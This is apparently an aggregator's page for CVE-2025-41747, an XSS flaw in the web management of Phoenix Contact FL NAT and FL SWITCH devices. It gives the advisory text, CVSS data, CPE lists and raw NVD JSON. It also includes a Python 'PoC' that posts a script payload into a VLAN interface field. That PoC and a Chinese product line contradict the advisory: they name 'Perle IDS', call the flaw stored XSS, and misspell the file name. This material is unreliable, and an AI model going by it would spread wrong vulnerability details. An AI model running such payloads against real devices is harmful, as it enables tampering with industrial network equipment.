CVE-2025-41747

Description

An XSS vulnerability in pxc_vlanIntfCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to send a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:phoenixcontact:fl_nat_2008_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_nat_2008:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_nat_2208_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_nat_2208:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_nat_2304-2gc-2sfp_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_nat_2304-2gc-2sfp:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2005_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2005:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2008_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2008:-:*:*:*:*:*:*:* - NOT VULNERABLE

Perle IDS设备 WBM管理界面 pxg_vlanIntfCfg.php < 受影响版本

具体版本信息需参考厂商官方公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-41747 PoC - Stored XSS in pxc_vlanIntfCfg.php
# Target: Perle IDS WBM (Web Based Management)

TARGET_URL = "http://<target-ip>/pxc_vlanIntfCfg.php"
XSS_PAYLOAD = '<script>alert("XSS")</script>'

def exploit(target_ip):
    """
    Exploit for CVE-2025-41747: Stored XSS in VLAN interface configuration
    This PoC demonstrates how an unauthenticated attacker can inject XSS payload
    through the VLAN interface configuration parameter.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    # Malicious POST data with XSS payload in VLAN interface parameter
    data = {
        'vlanIntfName': XSS_PAYLOAD,
        'vlanId': '100',
        'action': 'save'
    }
    
    try:
        response = requests.post(TARGET_URL, data=data, headers=headers, timeout=10)
        print(f'[+] Payload sent to {target_ip}')
        print(f'[+] Status code: {response.status_code}')
        print('[+] XSS payload injected in VLAN interface configuration')
        print('[+] When admin visits the page, the script will execute')
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f'Usage: python {sys.argv[0]} <target-ip>')
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41747
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41747
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41747/
[4] VulDB https://vuldb.com/cve/CVE-2025-41747
[5] https://certvde.com/de/advisories/VDE-2025-071

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41747", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:49.827", "lastModified": "2025-12-19T16:46:06.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An XSS vulnerability in pxc_vlanIntfCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to send a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_nat_2008_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "6A9FE2C7-C862-4EC7-933A-0F3E4E100444"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_nat_2008:-:*:*:*:*:*:*:*", "matchCriteriaId": "A03AD87F-AA1C-48EA-AC10-B5F20C3064F1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_nat_2208_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "A66309AE-7374-41A9-8281-68A0CDC437E1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_nat_2208:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2713DED-10BE-48AA-8CF0-764A3DD6A4E9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_nat_2304-2gc-2sfp_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "C49972CF-8229-42AD-BF96-A05C13119FBB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_nat_2304-2gc-2sfp:-:*:*:*:*:*:*:*", "matchCriteriaId": "C95847FA-DDAD-4753-B7F3-D67149DA639D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2005_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "96F33480-DC6D-4B9E-918F-BDC910146F4A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2005:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BE280FC-2A01-4B82-B954-91B86A4D7462"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2008_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "9773B1E5-62B1-44EB-B8DD-A2E45BF9D930"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2008:-:*:*:*:*:*:*:*", "matchCriteriaId": "322DF000-6060-4E37-A91F-0EF0D0A0E909"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2008f_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "DBFA9AC1-51A3-4516-81E9-8044EFB9E436"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2008f:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D3F1820-AF71-4D9A-BC63-1B886C739FD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2016_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "E2224C43-207D-4E66-96CE-7994EA2F0C6B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2016:-:*:*:*:*:*:*:*", "matchCriteriaId": "5C4DFBF9-2A05-4888-B457-E29617B74C95"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_ ... (truncated)